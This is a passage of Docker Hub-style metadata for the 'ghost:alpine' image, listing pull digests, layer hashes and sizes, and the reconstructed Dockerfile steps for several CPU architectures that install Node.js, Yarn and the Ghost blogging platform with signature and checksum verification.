MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:236aafa1a701379b0d4348fe37cbde158990b5800fa6eb0d5d8858086d02b728`
Last Modified: Tue, 26 May 2020 23:23:09 GMT
Size: 9.8 KB (9844 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:0a759720145554c63e8281ea807c07bb518517e054ab7cc4d25f51a7b516d708`
Last Modified: Tue, 26 May 2020 23:23:08 GMT
Size: 792.1 KB (792138 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:6ed24e040f9e49c5bc510fcb3bd39bcc31aa583115aeb95071f453133f94a603`
Last Modified: Tue, 26 May 2020 23:23:16 GMT
Size: 7.0 MB (7011446 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:c25f644c1c414feaae468678e58d00b20234c34fee72b5e14a6aa942d9388fcc`
Last Modified: Tue, 26 May 2020 23:23:31 GMT
Size: 55.7 MB (55695838 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:41615772ca14edceef4a72016e279156e64a53cf1c438b027f6aab418214fe48`
Last Modified: Tue, 26 May 2020 23:23:09 GMT
Size: 545.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; 386
```console
$ docker pull ghost@sha256:5fc9476912f50265af9223024191e933dcae69a81c26c3cae96ec2572ba395ee
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **93.6 MB (93648349 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:28bf84261e716bd24b958759b3c52f18cc3689b4047ccd1a26e3e8b06d0c25d8`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Thu, 23 Apr 2020 21:16:04 GMT
ADD file:63bd8a316cba8c404cc2e32a5120406c24aee8db3224c469a6077b941d900863 in /
# Thu, 23 Apr 2020 21:16:04 GMT
CMD ["/bin/sh"]
# Wed, 29 Apr 2020 04:47:36 GMT
ENV NODE_VERSION=12.16.3
# Wed, 29 Apr 2020 05:31:04 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="af47aa64de372d9a9d16307b6af9785ee28bdf9892f1de28a78b85917dacf257" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Wed, 29 Apr 2020 05:31:04 GMT
ENV YARN_VERSION=1.22.4
# Wed, 29 Apr 2020 05:31:07 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Wed, 29 Apr 2020 05:31:08 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Wed, 29 Apr 2020 05:31:08 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Wed, 29 Apr 2020 05:31:08 GMT
CMD ["node"]
# Wed, 29 Apr 2020 06:19:37 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Wed, 29 Apr 2020 06:19:38 GMT
RUN apk add --no-cache bash
# Wed, 29 Apr 2020 06:19:38 GMT
ENV NODE_ENV=production
# Tue, 26 May 2020 22:38:28 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Tue, 26 May 2020 22:38:46 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Tue, 26 May 2020 22:38:46 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Tue, 26 May 2020 22:38:47 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Tue, 26 May 2020 22:38:47 GMT
ENV GHOST_VERSION=3.17.1
# Tue, 26 May 2020 22:41:56 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Tue, 26 May 2020 22:41:57 GMT
WORKDIR /var/lib/ghost
# Tue, 26 May 2020 22:41:57 GMT
VOLUME [/var/lib/ghost/content]
# Tue, 26 May 2020 22:41:58 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Tue, 26 May 2020 22:41:58 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 22:41:58 GMT
EXPOSE 2368
# Tue, 26 May 2020 22:41:58 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:2826c1e79865da7e0da0a993a2a38db61c3911e05b5df617439a86d4deac90fb`
Last Modified: Thu, 23 Apr 2020 21:16:32 GMT
Size: 2.8 MB (2808418 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a146da8782b0a2b78256aaa25ee92fd617354f694aeace2b3951fab07b027563`
Last Modified: Wed, 29 Apr 2020 05:32:18 GMT
Size: 24.9 MB (24931595 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:25cb15e48bd1247c878221de413f1942fb7a082c5b789c0b94a025b6e8a0acfe`
Last Modified: Wed, 29 Apr 2020 05:32:12 GMT
Size: 2.3 MB (2294631 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:795a10dfdcd143e79354ce37f2fcb9dd923fbc4d3e6281f1be5c8619b654624b`
Last Modified: Wed, 29 Apr 2020 05:32:11 GMT
Size: 282.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:47c2188990e50e91234b3066f2b83b08529f15057c14fda8799fdbbedfc33fd3`
Last Modified: Wed, 29 Apr 2020 06:23:16 GMT
Size: 10.0 KB (9986 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:987839397957204c0cb5fe48a8aac315882c2895e54e2588a761de6afe65c215`
Last Modified: Wed, 29 Apr 2020 06:23:16 GMT
Size: 829.5 KB (829504 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:03e3f36c107dc02099e2a191c121e2e5d1fa5d029b81ec339073c2985d3e12c0`
Last Modified: Tue, 26 May 2020 22:46:15 GMT
Size: 7.0 MB (7011456 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d8e59aeea5bc63e948d60446afb45bba361a30b42ca732bbcd561ab27ddb8e7f`
Last Modified: Tue, 26 May 2020 22:46:36 GMT
Size: 55.8 MB (55761930 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ca533143b92bf4bab36ea76111b33bf54c2ced6f87500851008df141fa9cca3a`
Last Modified: Tue, 26 May 2020 22:46:08 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; ppc64le
```console
$ docker pull ghost@sha256:39f14809110ba0e6b54ae45150ea6aa8b3ec0b4ea5b554a1b451cc27ec8558ed
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **96.6 MB (96642603 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:890fac2a29a73f33a0a63061be342266500c6d25afa6fb4e7a714d311ae59ce9`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Thu, 23 Apr 2020 20:39:04 GMT
ADD file:1aaebe252dfb1885e066fcbc84aaa915bae149c3608f19600855ad1d4f7450c1 in /
# Thu, 23 Apr 2020 20:39:06 GMT
CMD ["/bin/sh"]
# Wed, 27 May 2020 00:16:14 GMT
ENV NODE_VERSION=12.17.0
# Wed, 27 May 2020 00:34:27 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Wed, 27 May 2020 00:34:33 GMT
ENV YARN_VERSION=1.22.4
# Wed, 27 May 2020 00:34:46 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Wed, 27 May 2020 00:34:48 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Wed, 27 May 2020 00:34:49 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Wed, 27 May 2020 00:34:53 GMT
CMD ["node"]
# Wed, 27 May 2020 00:57:44 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Wed, 27 May 2020 00:57:53 GMT
RUN apk add --no-cache bash
# Wed, 27 May 2020 00:57:55 GMT
ENV NODE_ENV=production
# Wed, 27 May 2020 00:57:57 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Wed, 27 May 2020 00:58:26 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Wed, 27 May 2020 00:58:30 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Wed, 27 May 2020 00:58:31 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Wed, 27 May 2020 00:58:36 GMT
ENV GHOST_VERSION=3.17.1
# Wed, 27 May 2020 01:02:38 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Wed, 27 May 2020 01:02:45 GMT
WORKDIR /var/lib/ghost
# Wed, 27 May 2020 01:02:48 GMT
VOLUME [/var/lib/ghost/content]
# Wed, 27 May 2020 01:02:49 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Wed, 27 May 2020 01:02:51 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Wed, 27 May 2020 01:02:55 GMT
EXPOSE 2368
# Wed, 27 May 2020 01:02:59 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:9a8fdc5b698322331ee7eba7dd6f66f3a4e956554db22dd1e834d519415b4f8e`
Last Modified: Thu, 23 Apr 2020 20:41:33 GMT
Size: 2.8 MB (2821843 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:84e2529b9fce5ca7dcc3e1d316618c522c77b97a5e727c8503a99bae0b4d9226`
Last Modified: Wed, 27 May 2020 00:40:30 GMT
Size: 27.0 MB (27027517 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:b2d452b247f39d6703a1720c556363c64284c4050d6a2edb625d1bba454df1d8`
Last Modified: Wed, 27 May 2020 00:40:22 GMT
Size: 2.3 MB (2302012 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:750ca7c7b76ad88a9365bb8c82b462b4363a88599b463446ab50b6a644010128`
Last Modified: Wed, 27 May 2020 00:40:21 GMT
Size: 281.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d3c227fbca15f32bbf20a1685f34b15e39b23f0db200a1bed9adb7302cdd117b`
Last Modified: Wed, 27 May 2020 01:04:38 GMT
Size: 10.4 KB (10403 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:6be9b179a56050b198e036667ea65c87aea4a5824e7863dd70c163a7e545f2aa`
Last Modified: Wed, 27 May 2020 01:04:38 GMT
Size: 862.6 KB (862606 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:7077e534c4b2192014aa6ee226b3dae8dc71a6ac8b0e95115a5f4fb290b82c62`
Last Modified: Wed, 27 May 2020 01:04:41 GMT
Size: 7.0 MB (7011377 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:2c86ff1ec1ef1704444877de227be31e043f99192d4facea6ae4b56b3c3bd703`
Last Modified: Wed, 27 May 2020 01:04:55 GMT
Size: 56.6 MB (56606023 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9415dd544bdaf2862d2102e83aedd31046485fa74d72c9aaa08bacacf221d651`
Last Modified: Wed, 27 May 2020 01:04:37 GMT
Size: 541.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `ghost:alpine` - linux; s390x
```console
$ docker pull ghost@sha256:a14eb53795ddd4d6b37c4c04865ab6c4320fd949b3248b2702f2697f88b3774b
```
- Docker Version: 18.09.7
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **93.1 MB (93101436 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:e7207f8adad6e2e432c16b1572c1fbb40144c74d5c0413e69c187821cd2f4edb`
- Entrypoint: `["docker-entrypoint.sh"]`
- Default Command: `["node","current\/index.js"]`
```dockerfile
# Thu, 23 Apr 2020 17:50:57 GMT
ADD file:a59a30c2fd43c9f3b820751a6f5a54688c14440a1ddace1ab255475f46e6ba2d in /
# Thu, 23 Apr 2020 17:50:58 GMT
CMD ["/bin/sh"]
# Tue, 26 May 2020 22:36:22 GMT
ENV NODE_VERSION=12.17.0
# Tue, 26 May 2020 22:57:51 GMT
RUN addgroup -g 1000 node && adduser -u 1000 -G node -s /bin/sh -D node && apk add --no-cache libstdc++ && apk add --no-cache --virtual .build-deps curl && ARCH= && alpineArch="$(apk --print-arch)" && case "${alpineArch##*-}" in x86_64) ARCH='x64' CHECKSUM="fbd8916cc5a3c85dc503cc1fe9606cf8860152c4e8b2f2fcc729e48db3e3d654" ;; *) ;; esac && if [ -n "${CHECKSUM}" ]; then set -eu; curl -fsSLO --compressed "https://unofficial-builds.nodejs.org/download/release/v$NODE_VERSION/node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz"; echo "$CHECKSUM node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" | sha256sum -c - && tar -xJf "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" -C /usr/local --strip-components=1 --no-same-owner && ln -s /usr/local/bin/node /usr/local/bin/nodejs; else echo "Building from source" && apk add --no-cache --virtual .build-deps-full binutils-gold g++ gcc gnupg libgcc linux-headers make python && for key in 94AE36675C464D64BAFA68DD7434390BDBE9B9C5 FD3A5288F042B6850C66B31F09FE44734EB7990E 71DCFD284A79C3B38668286BC97EC7A07EDE3FC1 DD8F2338BAE7501E3DD5AC78C273792F7D83545D C4F0DFFF4E8C1A8236409D08E73BC641CC11F4C8 B9AE9905FFD7803F25714661B63B535A4C206CA9 77984A986EBC2AA786BC0F66B01FBB92821C587A 8FCCA13FEF1D0C2E91008E09770F7A9A5AE15600 4ED778F539E3634C779C87C6D7062848A1AB005C A48C2BEE680E841632CD4E44F07496B3EB3C1762 B9E2F5981AA6E0CD28160D9FF13993A75599653C ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/node-v$NODE_VERSION.tar.xz" && curl -fsSLO --compressed "https://nodejs.org/dist/v$NODE_VERSION/SHASUMS256.txt.asc" && gpg --batch --decrypt --output SHASUMS256.txt SHASUMS256.txt.asc && grep " node-v$NODE_VERSION.tar.xz\$" SHASUMS256.txt | sha256sum -c - && tar -xf "node-v$NODE_VERSION.tar.xz" && cd "node-v$NODE_VERSION" && ./configure && make -j$(getconf _NPROCESSORS_ONLN) V= && make install && apk del .build-deps-full && cd .. && rm -Rf "node-v$NODE_VERSION" && rm "node-v$NODE_VERSION.tar.xz" SHASUMS256.txt.asc SHASUMS256.txt; fi && rm -f "node-v$NODE_VERSION-linux-$ARCH-musl.tar.xz" && apk del .build-deps && node --version && npm --version
# Tue, 26 May 2020 22:57:55 GMT
ENV YARN_VERSION=1.22.4
# Tue, 26 May 2020 22:58:00 GMT
RUN apk add --no-cache --virtual .build-deps-yarn curl gnupg tar && for key in 6A010C5166006599AA17F08146C2130DFD2497F5 ; do gpg --batch --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys "$key" || gpg --batch --keyserver hkp://ipv4.pool.sks-keyservers.net --recv-keys "$key" || gpg --batch --keyserver hkp://pgp.mit.edu:80 --recv-keys "$key" ; done && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz" && curl -fsSLO --compressed "https://yarnpkg.com/downloads/$YARN_VERSION/yarn-v$YARN_VERSION.tar.gz.asc" && gpg --batch --verify yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && mkdir -p /opt && tar -xzf yarn-v$YARN_VERSION.tar.gz -C /opt/ && ln -s /opt/yarn-v$YARN_VERSION/bin/yarn /usr/local/bin/yarn && ln -s /opt/yarn-v$YARN_VERSION/bin/yarnpkg /usr/local/bin/yarnpkg && rm yarn-v$YARN_VERSION.tar.gz.asc yarn-v$YARN_VERSION.tar.gz && apk del .build-deps-yarn && yarn --version
# Tue, 26 May 2020 22:58:00 GMT
COPY file:238737301d47304174e4d24f4def935b29b3069c03c72ae8de97d94624382fce in /usr/local/bin/
# Tue, 26 May 2020 22:58:00 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 22:58:01 GMT
CMD ["node"]
# Tue, 26 May 2020 23:05:59 GMT
RUN apk add --no-cache 'su-exec>=0.2'
# Tue, 26 May 2020 23:06:01 GMT
RUN apk add --no-cache bash
# Tue, 26 May 2020 23:06:01 GMT
ENV NODE_ENV=production
# Tue, 26 May 2020 23:06:02 GMT
ENV GHOST_CLI_VERSION=1.14.0
# Tue, 26 May 2020 23:06:24 GMT
RUN set -eux; npm install -g "ghost-cli@$GHOST_CLI_VERSION"; npm cache clean --force
# Tue, 26 May 2020 23:06:28 GMT
ENV GHOST_INSTALL=/var/lib/ghost
# Tue, 26 May 2020 23:06:28 GMT
ENV GHOST_CONTENT=/var/lib/ghost/content
# Tue, 26 May 2020 23:06:29 GMT
ENV GHOST_VERSION=3.17.1
# Tue, 26 May 2020 23:08:53 GMT
RUN set -eux; mkdir -p "$GHOST_INSTALL"; chown node:node "$GHOST_INSTALL"; su-exec node ghost install "$GHOST_VERSION" --db sqlite3 --no-prompt --no-stack --no-setup --dir "$GHOST_INSTALL"; cd "$GHOST_INSTALL"; su-exec node ghost config --ip 0.0.0.0 --port 2368 --no-prompt --db sqlite3 --url http://localhost:2368 --dbpath "$GHOST_CONTENT/data/ghost.db"; su-exec node ghost config paths.contentPath "$GHOST_CONTENT"; su-exec node ln -s config.production.json "$GHOST_INSTALL/config.development.json"; readlink -f "$GHOST_INSTALL/config.development.json"; mv "$GHOST_CONTENT" "$GHOST_INSTALL/content.orig"; mkdir -p "$GHOST_CONTENT"; chown node:node "$GHOST_CONTENT"; cd "$GHOST_INSTALL/current"; sqlite3Version="$(node -p 'require("./package.json").optionalDependencies.sqlite3')"; if ! su-exec node yarn add "sqlite3@$sqlite3Version" --force; then apk add --no-cache --virtual .build-deps python make gcc g++ libc-dev; su-exec node yarn add "sqlite3@$sqlite3Version" --force --build-from-source; apk del --no-network .build-deps; fi; su-exec node yarn cache clean; su-exec node npm cache clean --force; npm cache clean --force; rm -rv /tmp/yarn* /tmp/v8*
# Tue, 26 May 2020 23:09:04 GMT
WORKDIR /var/lib/ghost
# Tue, 26 May 2020 23:09:04 GMT
VOLUME [/var/lib/ghost/content]
# Tue, 26 May 2020 23:09:04 GMT
COPY file:87209c4c75826f5d839c2f3270a782740f42eecf4bc96b2f6dbae79b08c17e21 in /usr/local/bin
# Tue, 26 May 2020 23:09:05 GMT
ENTRYPOINT ["docker-entrypoint.sh"]
# Tue, 26 May 2020 23:09:05 GMT
EXPOSE 2368
# Tue, 26 May 2020 23:09:06 GMT
CMD ["node" "current/index.js"]
```
- Layers:
- `sha256:7184c046fdf17da4c16ca482e5ede36e1f2d41ac8cea9c036e488fd149d6e8e7`
Last Modified: Thu, 23 Apr 2020 17:51:38 GMT
Size: 2.6 MB (2582859 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:99e2156401d0b9994bb97f6452e09d37e340162d6b2d219e1046554e29ba89d1`
Last Modified: Tue, 26 May 2020 23:01:43 GMT
Size: 24.8 MB (24787836 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:3f36bb1dc8adf3d4deb052d28dd10963378d964d41bcca9ac3091f29c9c6d4ee`
Last Modified: Tue, 26 May 2020 23:01:32 GMT
Size: 2.3 MB (2304504 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ab1f35ad9e99020167fc244f6a3dadbffda06983ab46d10800245ab41bf2ac84`
Last Modified: Tue, 26 May 2020 23:01:26 GMT
Size: 280.0 B
